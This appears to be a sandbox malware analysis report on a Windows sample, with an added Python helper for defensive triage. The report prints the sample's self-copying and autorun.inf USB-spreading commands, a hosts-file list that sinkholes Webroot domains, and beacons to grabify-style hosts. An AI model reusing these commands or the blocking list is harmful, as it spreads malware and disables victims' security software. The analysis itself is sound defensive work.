Windows Analysis Report
IPrstVM17M.exe

Overview

General Information

Sample name: IPrstVM17M.exe
(file extension renamed from none to exe because the original name is a hash value)
Original sample name: 3b3e9249075fce915a1671b47e2f4d164d835ab5d425f3aae2502c41409f6448
Analysis ID: 1430905
MD5: a23b11e50c1f6fcdb42d3b2582524e2f
SHA1: 8b54ea0bc8e4545759e0ea82d28fd608fe0d97ee
SHA256: 3b3e9249075fce915a1671b47e2f4d164d835ab5d425f3aae2502c41409f6448

Detection

Score: 64
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the hosts file
Queries Google from non browser process on port 80
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Creates a process in suspended mode (likely to inject code)
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Copy From or To System Directory
Uses 32bit PE files

Classification

AV Detection

Source: IPrstVM17M.exe ReversingLabs: Detection: 15%
Source: IPrstVM17M.exe Virustotal: Detection: 14%
Source: C:\Users\user\AppData\Local\Temp\bin.exe Joe Sandbox ML: detected
Source: IPrstVM17M.exe Joe Sandbox ML: detected
Source: IPrstVM17M.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 52.173.151.229:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.161.186:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.8.202:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: IPrstVM17M.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\J\source\repos\FastSwipe\Release\FastSwipe.pdb source: IPrstVM17M.exe, bin.exe.3.dr
Source: Binary string: C:\Users\J\source\repos\FastSwipe\Release\FastSwipe.pdb'' source: IPrstVM17M.exe, bin.exe.3.dr
Source: IPrstVM17M.exe Binary or memory string: echo [autorun] > D:\autorun.inf
Source: IPrstVM17M.exe Binary or memory string: echo open=bin.exe >> D:\autorun.inf
Source: IPrstVM17M.exe Binary or memory string: echo open=bin.exe >> E:\autorun.inf
Source: IPrstVM17M.exe Binary or memory string: echo [autorun] > E:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000002.4424004145.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\Windows\system32\cmd.exe /c echo open=bin.exe >> D:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000002.4424004145.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\Windows\system32\cmd.exe /c echo open=bin.exe >> E:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000002.4424004145.00000000009F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\Windows\system32\cmd.exe /c echo [autorun] > D:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000002.4424004145.00000000009F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\Windows\system32\cmd.exe /c echo [autorun] > E:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000000.1976400525.000000000020C000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: echo [autorun] > D:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000000.1976400525.000000000020C000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: echo open=bin.exe >> D:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000000.1976400525.000000000020C000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: echo [autorun] > E:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000000.1976400525.000000000020C000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: echo open=bin.exe >> E:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000000.1976400525.000000000020C000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: copy /v /y "%s" D:\bin.exeecho [autorun] > D:\autorun.infecho open=bin.exe >> D:\autorun.infcopy /v /y "%s" E:\bin.exeecho [autorun] > E:\autorun.infecho open=bin.exe >> E:\autorun.infStarted blocking antiviruses...1.1.1.1 mail.webroot.comC:\Windows\System32\drivers\etc\hosts1.1.1.1 carbonite.webroot.com1.1.1.1 e.webroot.com1.1.1.1 entupdates-cdn.webroot.com1.1.1.1 lp-carbonite.webroot.com1.1.1.1 lp.webroot.com1.1.1.1 technet.webroot.com1.1.1.1 cms.webroot.com1.1.1.1 partner.webroot.com1.1.1.1 lp-carbonite-sandbox.webroot.com1.1.1.1 smtp-co.webroot.com1.1.1.1 smtp-ca.webroot.com1.1.1.1 vdi.webroot.com1.1.1.1 es.webroot.com1.1.1.1 usmail.webroot.com1.1.1.1 sftp.webroot.com1.1.1.1 lyncdiscover.webroot.com1.1.1.1 fr.webroot.com1.1.1.1 it.webroot.com1.1.1.1 dnsptest.webroot.com1.1.1.1 bounce2.webroot.com1.1.1.1 provisioningdev1.webroot.com1.1.1.1 nl.webroot.com1.1.1.1 mobiletest.webroot.com1.1.1.1 support-nl.webroot.com1.1.1.1 support-es.webroot.com1.1.1.1 sip.webroot.com1.1.1.1 contentr.webroot.com1.1.1.1 childsafe.webroot.com1.1.1.1 spyware.webroot.com1.1.1.1 testvpn.webroot.com1.1.1.1 support-de.webroot.com1.1.1.1 support-au.webroot.com1.1.1.1 support-fr.webroot.com1.1.1.1 support-it.webroot.com1.1.1.1 extranet.webroot.com1.1.1.1 sso-tst.webroot.com1.1.1.1 uk.webroot.com1.1.1.1 bb.webroot.com1.1.1.1 ncmec.webroot.com1.1.1.1 stage.webroot.com1.1.1.1 provisioningtest2.webroot.com1.1.1.1 websrv-stg.webroot.com1.1.1.1 de.webroot.com1.1.1.1 computer-security.webroot.com1.1.1.1 reseller.webroot.com1.1.1.1 connectuk.webroot.com1.1.1.1 vpn.webroot.com1.1.1.1 outbound5.webroot.com1.1.1.1 outbound2.webroot.com1.1.1.1 outbound3.webroot.com1.1.1.1 provisioningtest5.webroot.com1.1.1.1 view.webroot.com1.1.1.1 provisioningdev.webroot.com1.1.1.1 mydata.webroot.com1.1.1.1 provisioningtest4.webroot.com1.1.1.1 sfdcstage.webroot.com1.1.1.1 
provisioning.webroot.com1.1.1.1 channeledge.webroot.com1.1.1.1 www2.webroot.com1.1.1.1 provisioningtest3.webroot.com1.1.1.1 mx.webroot.com1.1.1.1 support-enterprise.webroot.com1.1.1.1 autodiscover.webroot.com1.1.1.1 ws.webroot.com1.1.1.1 owauk.webroot.com1.1.1.1 outbound1.webroot.com1.1.1.1 research.webroot.com1.1.1.1 access-tst.webroot.com1.1.1.1 vpnuk.webroot.com1.1.1.1 ws-stg.webroot.com1.1.1.1 outbound4.webroot.com1.1.1.1 provisioningdev2.webroot.com1.1.1.1 myproduct.webroot.com1.1.1.1 labs.webroot.com1.1.1.1 tunnelfe.webroot.com1.1.1.1 mailbox.webroot.com1.1.1.1 outbound.webroot.com1.1.1.1 access.webroot.com1.1.1.1 sfdctest6.webroot.com1.1.1.1 encrypt.webroot.com1.1.1.1 outbound6.webroot.com1.1.1.1 mirage.webroot.com1.1.1.1 provisioningtest1.webroot.com1.1.1.1 origin-stage.webroot.com1.1.1.1 outbound7.webroot.com1.1.1.1 provisioningdev4.webroot.com1.1.1.1 workspace.webroot.com1.1.1.1 email.webroot.com1.1.1.1 itpro.webroot.com1.1.1.1 webmail.webroot.com1.1.1.1 brightcloud.webroot.com1.1.1.1 outlook.webroot.com1.1.1.1 android.webroot.com1.1.1.1 bounce.webroot.com1.1.1.1 codingchallenge.webroot.com1.1.1.1 connect.webroot.com1.1.1
Source: IPrstVM17M.exe, 00000000.00000003.2038499719.00000000033D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: echo [autorun] > D:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000003.2038499719.00000000033D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: echo open=bin.exe >> D:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000003.2038499719.00000000033D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: echo [autorun] > E:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000003.2038499719.00000000033D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: echo open=bin.exe >> E:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000003.2038465410.0000000000A83000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: echo [autorun] > D:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000003.2038465410.0000000000A83000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: echo open=bin.exe >> D:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000003.2038465410.0000000000A83000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: echo [autorun] > E:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000003.2038465410.0000000000A83000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: echo open=bin.exe >> E:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: echo [autorun] > D:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: echo open=bin.exe >> D:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: echo [autorun] > E:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000002.4423772056.000000000020C000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: echo open=bin.exe >> E:\autorun.inf
Source: IPrstVM17M.exe Binary or memory string: echo [autorun] > D:\autorun.inf
Source: IPrstVM17M.exe Binary or memory string: echo open=bin.exe >> D:\autorun.inf
Source: IPrstVM17M.exe Binary or memory string: echo [autorun] > E:\autorun.inf
Source: IPrstVM17M.exe Binary or memory string: echo open=bin.exe >> E:\autorun.inf
Source: IPrstVM17M.exe Binary or memory string: copy /v /y "%s" D:\bin.exeecho [autorun] > D:\autorun.infecho open=bin.exe >> D:\autorun.infcopy /v /y "%s" E:\bin.exeecho [autorun] > E:\autorun.infecho open=bin.exe >> E:\autorun.infStarted blocking antiviruses...1.1.1.1 mail.webroot.comC:\Windows\System32\drivers\etc\hosts1.1.1.1 carbonite.webroot.com1.1.1.1 e.webroot.com1.1.1.1 entupdates-cdn.webroot.com1.1.1.1 lp-carbonite.webroot.com1.1.1.1 lp.webroot.com1.1.1.1 technet.webroot.com1.1.1.1 cms.webroot.com1.1.1.1 partner.webroot.com1.1.1.1 lp-carbonite-sandbox.webroot.com1.1.1.1 smtp-co.webroot.com1.1.1.1 smtp-ca.webroot.com1.1.1.1 vdi.webroot.com1.1.1.1 es.webroot.com1.1.1.1 usmail.webroot.com1.1.1.1 sftp.webroot.com1.1.1.1 lyncdiscover.webroot.com1.1.1.1 fr.webroot.com1.1.1.1 it.webroot.com1.1.1.1 dnsptest.webroot.com1.1.1.1 bounce2.webroot.com1.1.1.1 provisioningdev1.webroot.com1.1.1.1 nl.webroot.com1.1.1.1 mobiletest.webroot.com1.1.1.1 support-nl.webroot.com1.1.1.1 support-es.webroot.com1.1.1.1 sip.webroot.com1.1.1.1 contentr.webroot.com1.1.1.1 childsafe.webroot.com1.1.1.1 spyware.webroot.com1.1.1.1 testvpn.webroot.com1.1.1.1 support-de.webroot.com1.1.1.1 support-au.webroot.com1.1.1.1 support-fr.webroot.com1.1.1.1 support-it.webroot.com1.1.1.1 extranet.webroot.com1.1.1.1 sso-tst.webroot.com1.1.1.1 uk.webroot.com1.1.1.1 bb.webroot.com1.1.1.1 ncmec.webroot.com1.1.1.1 stage.webroot.com1.1.1.1 provisioningtest2.webroot.com1.1.1.1 websrv-stg.webroot.com1.1.1.1 de.webroot.com1.1.1.1 computer-security.webroot.com1.1.1.1 reseller.webroot.com1.1.1.1 connectuk.webroot.com1.1.1.1 vpn.webroot.com1.1.1.1 outbound5.webroot.com1.1.1.1 outbound2.webroot.com1.1.1.1 outbound3.webroot.com1.1.1.1 provisioningtest5.webroot.com1.1.1.1 view.webroot.com1.1.1.1 provisioningdev.webroot.com1.1.1.1 mydata.webroot.com1.1.1.1 provisioningtest4.webroot.com1.1.1.1 sfdcstage.webroot.com1.1.1.1 provisioning.webroot.com1.1.1.1 channeledge.webroot.com1.1.1.1 www2.webroot.com1.1.1.1 
provisioningtest3.webroot.com1.1.1.1 mx.webroot.com1.1.1.1 support-enterprise.webroot.com1.1.1.1 autodiscover.webroot.com1.1.1.1 ws.webroot.com1.1.1.1 owauk.webroot.com1.1.1.1 outbound1.webroot.com1.1.1.1 research.webroot.com1.1.1.1 access-tst.webroot.com1.1.1.1 vpnuk.webroot.com1.1.1.1 ws-stg.webroot.com1.1.1.1 outbound4.webroot.com1.1.1.1 provisioningdev2.webroot.com1.1.1.1 myproduct.webroot.com1.1.1.1 labs.webroot.com1.1.1.1 tunnelfe.webroot.com1.1.1.1 mailbox.webroot.com1.1.1.1 outbound.webroot.com1.1.1.1 access.webroot.com1.1.1.1 sfdctest6.webroot.com1.1.1.1 encrypt.webroot.com1.1.1.1 outbound6.webroot.com1.1.1.1 mirage.webroot.com1.1.1.1 provisioningtest1.webroot.com1.1.1.1 origin-stage.webroot.com1.1.1.1 outbound7.webroot.com1.1.1.1 provisioningdev4.webroot.com1.1.1.1 workspace.webroot.com1.1.1.1 email.webroot.com1.1.1.1 itpro.webroot.com1.1.1.1 webmail.webroot.com1.1.1.1 brightcloud.webroot.com1.1.1.1 outlook.webroot.com1.1.1.1 android.webroot.com1.1.1.1 bounce.webroot.com1.1.1.1 codingchallenge.webroot.com1.1.1.1 connect.webroot.com1.1.1
Source: bin.exe.3.dr Binary or memory string: echo [autorun] > D:\autorun.inf
Source: bin.exe.3.dr Binary or memory string: echo open=bin.exe >> D:\autorun.inf
Source: bin.exe.3.dr Binary or memory string: echo [autorun] > E:\autorun.inf
Source: bin.exe.3.dr Binary or memory string: echo open=bin.exe >> E:\autorun.inf
Source: bin.exe.3.dr Binary or memory string: copy /v /y "%s" D:\bin.exeecho [autorun] > D:\autorun.infecho open=bin.exe >> D:\autorun.infcopy /v /y "%s" E:\bin.exeecho [autorun] > E:\autorun.infecho open=bin.exe >> E:\autorun.infStarted blocking antiviruses...1.1.1.1 mail.webroot.comC:\Windows\System32\drivers\etc\hosts1.1.1.1 carbonite.webroot.com1.1.1.1 e.webroot.com1.1.1.1 entupdates-cdn.webroot.com1.1.1.1 lp-carbonite.webroot.com1.1.1.1 lp.webroot.com1.1.1.1 technet.webroot.com1.1.1.1 cms.webroot.com1.1.1.1 partner.webroot.com1.1.1.1 lp-carbonite-sandbox.webroot.com1.1.1.1 smtp-co.webroot.com1.1.1.1 smtp-ca.webroot.com1.1.1.1 vdi.webroot.com1.1.1.1 es.webroot.com1.1.1.1 usmail.webroot.com1.1.1.1 sftp.webroot.com1.1.1.1 lyncdiscover.webroot.com1.1.1.1 fr.webroot.com1.1.1.1 it.webroot.com1.1.1.1 dnsptest.webroot.com1.1.1.1 bounce2.webroot.com1.1.1.1 provisioningdev1.webroot.com1.1.1.1 nl.webroot.com1.1.1.1 mobiletest.webroot.com1.1.1.1 support-nl.webroot.com1.1.1.1 support-es.webroot.com1.1.1.1 sip.webroot.com1.1.1.1 contentr.webroot.com1.1.1.1 childsafe.webroot.com1.1.1.1 spyware.webroot.com1.1.1.1 testvpn.webroot.com1.1.1.1 support-de.webroot.com1.1.1.1 support-au.webroot.com1.1.1.1 support-fr.webroot.com1.1.1.1 support-it.webroot.com1.1.1.1 extranet.webroot.com1.1.1.1 sso-tst.webroot.com1.1.1.1 uk.webroot.com1.1.1.1 bb.webroot.com1.1.1.1 ncmec.webroot.com1.1.1.1 stage.webroot.com1.1.1.1 provisioningtest2.webroot.com1.1.1.1 websrv-stg.webroot.com1.1.1.1 de.webroot.com1.1.1.1 computer-security.webroot.com1.1.1.1 reseller.webroot.com1.1.1.1 connectuk.webroot.com1.1.1.1 vpn.webroot.com1.1.1.1 outbound5.webroot.com1.1.1.1 outbound2.webroot.com1.1.1.1 outbound3.webroot.com1.1.1.1 provisioningtest5.webroot.com1.1.1.1 view.webroot.com1.1.1.1 provisioningdev.webroot.com1.1.1.1 mydata.webroot.com1.1.1.1 provisioningtest4.webroot.com1.1.1.1 sfdcstage.webroot.com1.1.1.1 provisioning.webroot.com1.1.1.1 channeledge.webroot.com1.1.1.1 www2.webroot.com1.1.1.1 
provisioningtest3.webroot.com1.1.1.1 mx.webroot.com1.1.1.1 support-enterprise.webroot.com1.1.1.1 autodiscover.webroot.com1.1.1.1 ws.webroot.com1.1.1.1 owauk.webroot.com1.1.1.1 outbound1.webroot.com1.1.1.1 research.webroot.com1.1.1.1 access-tst.webroot.com1.1.1.1 vpnuk.webroot.com1.1.1.1 ws-stg.webroot.com1.1.1.1 outbound4.webroot.com1.1.1.1 provisioningdev2.webroot.com1.1.1.1 myproduct.webroot.com1.1.1.1 labs.webroot.com1.1.1.1 tunnelfe.webroot.com1.1.1.1 mailbox.webroot.com1.1.1.1 outbound.webroot.com1.1.1.1 access.webroot.com1.1.1.1 sfdctest6.webroot.com1.1.1.1 encrypt.webroot.com1.1.1.1 outbound6.webroot.com1.1.1.1 mirage.webroot.com1.1.1.1 provisioningtest1.webroot.com1.1.1.1 origin-stage.webroot.com1.1.1.1 outbound7.webroot.com1.1.1.1 provisioningdev4.webroot.com1.1.1.1 workspace.webroot.com1.1.1.1 email.webroot.com1.1.1.1 itpro.webroot.com1.1.1.1 webmail.webroot.com1.1.1.1 brightcloud.webroot.com1.1.1.1 outlook.webroot.com1.1.1.1 android.webroot.com1.1.1.1 bounce.webroot.com1.1.1.1 codingchallenge.webroot.com1.1.1.1 connect.webroot.com1.1.1
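The strings above are the sample's whole blocking-and-spreading routine in clear text: a `copy` of itself to `D:\bin.exe` and `E:\bin.exe`, an `autorun.inf` with `open=bin.exe` written beside each copy, and a list of `1.1.1.1 <vendor host>` lines destined for `C:\Windows\System32\drivers\etc\hosts` (the "Modifies the hosts file" event later in the report is this list being written). The Python helper below is an added triage example for this report, not Joe Sandbox code and not code from the sample. It decodes a constructed excerpt of that string dump (the pieces are NUL-separated in the binary, so the extractor ran them together without newlines) and reports what the payload would change on a victim host. The regexes, the `SECURITY_VENDOR_KEYWORDS` list and the excerpt itself are assumptions of this example.

```python
"""Triage helper added for this report (not Joe Sandbox code and not the
sample's own code): decodes the hosts-file and autorun.inf payload visible in
the sample's strings and reports what it would change on a victim host."""
import re
from collections import defaultdict

# Constructed excerpt of the string dump quoted in the report: the pieces are
# NUL-separated in the binary, so the extractor ran them together without
# newlines. Only a few of the webroot.com entries are reproduced here.
SAMPLE_BLOB = (
    'copy /v /y "%s" D:\\bin.exeecho [autorun] > D:\\autorun.inf'
    'echo open=bin.exe >> D:\\autorun.infcopy /v /y "%s" E:\\bin.exe'
    'echo [autorun] > E:\\autorun.infecho open=bin.exe >> E:\\autorun.inf'
    'Started blocking antiviruses...1.1.1.1 mail.webroot.com'
    'C:\\Windows\\System32\\drivers\\etc\\hosts1.1.1.1 carbonite.webroot.com'
    '1.1.1.1 e.webroot.com1.1.1.1 entupdates-cdn.webroot.com'
)

# A hosts entry is "<ipv4> <hostname>"; because the newlines are gone, the
# hostname is terminated by the next IP, by a drive-letter path, or by the end.
HOSTS_ENTRY = re.compile(
    r'(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+'
    r'(?P<host>[A-Za-z0-9][A-Za-z0-9.-]*?)'
    r'(?=\d{1,3}(?:\.\d{1,3}){3}\s|[A-Za-z]:\\|$)'
)

# "echo <text> > X:\autorun.inf" and "echo <text> >> X:\autorun.inf"
AUTORUN_ECHO = re.compile(
    r'echo (?P<text>.+?) (?P<op>>>?) (?P<drive>[A-Za-z]:)\\autorun\.inf'
)
# 'copy /v /y "<src>" X:\<name>' followed immediately by the next command
COPY_TO_DRIVE = re.compile(
    r'copy /v /y "(?P<src>[^"]*)" (?P<dst>[A-Za-z]:\\[^\s]+?)(?=echo |copy |$)'
)

# Assumed vendor keywords; extend with whatever products your estate runs.
SECURITY_VENDOR_KEYWORDS = ("webroot", "carbonite", "brightcloud")


def extract_hosts_entries(blob):
    """Return the (ip, hostname) pairs the malware would append to hosts."""
    return [(m.group("ip"), m.group("host")) for m in HOSTS_ENTRY.finditer(blob)]


def sinkholed_security_domains(entries, keywords=SECURITY_VENDOR_KEYWORDS):
    """Entries that pin a security vendor's hostname to any address at all:
    1.1.1.1, 127.0.0.1 and 0.0.0.0 all break product updates and cloud lookups."""
    return [
        (ip, host) for ip, host in entries
        if any(k in host.lower() for k in keywords)
    ]


def reconstruct_autorun(blob):
    """Rebuild, per drive letter, the file the copy command drops and the
    autorun.inf content the echo commands write ('>' truncates, '>>' appends)."""
    drives = defaultdict(lambda: {"dropped": None, "autorun_inf": []})
    for m in COPY_TO_DRIVE.finditer(blob):
        drives[m.group("dst")[:2].upper()]["dropped"] = m.group("dst")
    for m in AUTORUN_ECHO.finditer(blob):
        entry = drives[m.group("drive").upper()]
        if m.group("op") == ">":
            entry["autorun_inf"] = []
        entry["autorun_inf"].append(m.group("text"))
    return dict(drives)


def autorun_launches(drives):
    """Map drive -> executable named by an 'open=' line in its autorun.inf."""
    launches = {}
    for drive, info in drives.items():
        for line in info["autorun_inf"]:
            if line.lower().startswith("open="):
                launches[drive] = line.split("=", 1)[1]
    return launches


if __name__ == "__main__":
    entries = extract_hosts_entries(SAMPLE_BLOB)
    for ip, host in sinkholed_security_domains(entries):
        print(f"hosts hijack: {host} -> {ip}")
    drives = reconstruct_autorun(SAMPLE_BLOB)
    for drive, exe in autorun_launches(drives).items():
        print(f"USB spread: {drive} gets {drives[drive]['dropped']} and autoruns {exe}")
```

Two points the decoded output makes clear. The hosts entries pin the vendor's provisioning, update-CDN and support hosts to 1.1.1.1 (Cloudflare's public resolver address) rather than to 127.0.0.1, so the product's cloud lookups and updates reach a live but wrong host and fail; the indicator to hunt for is any hosts line that maps a security vendor's domain anywhere, whatever the IP. The `open=bin.exe` line relies on AutoRun, which current Windows does not honour for USB mass-storage devices (the restriction dates from the 2011 AutoRun update), so the USB spread only fires on legacy or deliberately re-enabled hosts; a `bin.exe` plus `autorun.inf` pair in the root of a removable drive is still a useful artefact to sweep for.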

Networking

barindex
Source: C:\Users\user\Desktop\IPrstVM17M.exe HTTP traffic: GET / HTTP/1.1 User-Agent: MyApp Cache-Control: no-cache Connection: Keep-Alive Host: google.com
Source: C:\Users\user\Desktop\IPrstVM17M.exe HTTP traffic: GET /sorry/index?continue=http://google.com/&q=EgSaEGkkGMWRo7EGIjBKruM9TP71tcZqrz-afg1iOmL2n35A4yTbBqzqNKMrw11J0yadIqqCBxJ8xaVvZTgyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 User-Agent: MyApp Cache-Control: no-cache Connection: Keep-Alive Host: www.google.com Cookie: NID=513=H1RAwZMpbccP2MupfzVClLXvboj2k_4nyM1TDtjKSCFjsE7EiTXH9bwLa77-PG9rFOQLO1-g_QxGqzQ3X6qDivIZpRs6mZysq9oxrD3VPUUav5jdQzsmUXuWYf1dyfAzzncyChxc77K4MzSt1SRaCs54NHbaLRz1tZDj5AKJbP8
Source: Joe Sandbox View IP Address: 104.26.8.202
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1 (logged 5 times)
Source: global traffic HTTP traffic detected: GET /news.php?tid=JBB69H.jpg HTTP/1.1 User-Agent: MyApp Host: stopify.co Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /news.php?tid=JBB69H.jpg HTTP/1.1 User-Agent: MyApp Cache-Control: no-cache Host: grabify.world Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /news.php?tid=JBB69H.jpg HTTP/1.1 User-Agent: MyApp Cache-Control: no-cache Connection: Keep-Alive Host: grabify.link
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: MyApp Cache-Control: no-cache Connection: Keep-Alive Host: google.com
Source: global traffic HTTP traffic detected: GET /sorry/index?continue=http://google.com/&q=EgSaEGkkGMWRo7EGIjBKruM9TP71tcZqrz-afg1iOmL2n35A4yTbBqzqNKMrw11J0yadIqqCBxJ8xaVvZTgyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 User-Agent: MyApp Cache-Control: no-cache Connection: Keep-Alive Host: www.google.com Cookie: NID=513=H1RAwZMpbccP2MupfzVClLXvboj2k_4nyM1TDtjKSCFjsE7EiTXH9bwLa77-PG9rFOQLO1-g_QxGqzQ3X6qDivIZpRs6mZysq9oxrD3VPUUav5jdQzsmUXuWYf1dyfAzzncyChxc77K4MzSt1SRaCs54NHbaLRz1tZDj5AKJbP8
Source: unknown DNS traffic detected: queries for: stopify.co
Source: IPrstVM17M.exe, 00000000.00000003.2023589857.0000000000A26000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://google.com
Source: IPrstVM17M.exe, 00000000.00000003.2038598914.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000002.4424004145.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2023899869.0000000000A27000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://google.com/
Source: IPrstVM17M.exe, 00000000.00000002.4424004145.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000002.4424004145.00000000009C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://google.com/&q=EgSaEGkkGMWRo7EGIjBKruM9TP71tcZqrz-afg1iOmL2n35A4yTbBqzqNKMrw11J0yadIqqCBxJ8xaV
Source: IPrstVM17M.exe, 00000000.00000003.2038598914.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000002.4424004145.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2023899869.0000000000A27000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://google.com/7
Source: IPrstVM17M.exe, 00000000.00000003.2023899869.0000000000A27000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://google.com1
Source: IPrstVM17M.exe, 00000000.00000003.2038598914.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.google.com/
Source: IPrstVM17M.exe, 00000000.00000003.2038598914.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.google.com/.
Source: IPrstVM17M.exe, 00000000.00000003.2038598914.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.google.com/B
Source: IPrstVM17M.exe, 00000000.00000002.4424004145.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000002.4424004145.00000000009C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.google.com/sorry/index?continue=http://google.com/&q=EgSaEGkkGMWRo7EGIjBKruM9TP71tcZqrz-a
Source: IPrstVM17M.exe, 00000000.00000003.2038598914.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.google.com/ws.php?tid=JBB69H.jpg
Source: IPrstVM17M.exe, 00000000.00000003.2002690521.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2038598914.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2023899869.0000000000A27000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2023589857.0000000000A26000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://grabify.$
Source: IPrstVM17M.exe, 00000000.00000003.2002690521.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2038598914.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000002.4424004145.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2023899869.0000000000A27000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2023589857.0000000000A26000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://grabify.link/
Source: IPrstVM17M.exe, 00000000.00000003.2002690521.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2023589857.0000000000A26000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://grabify.link/(
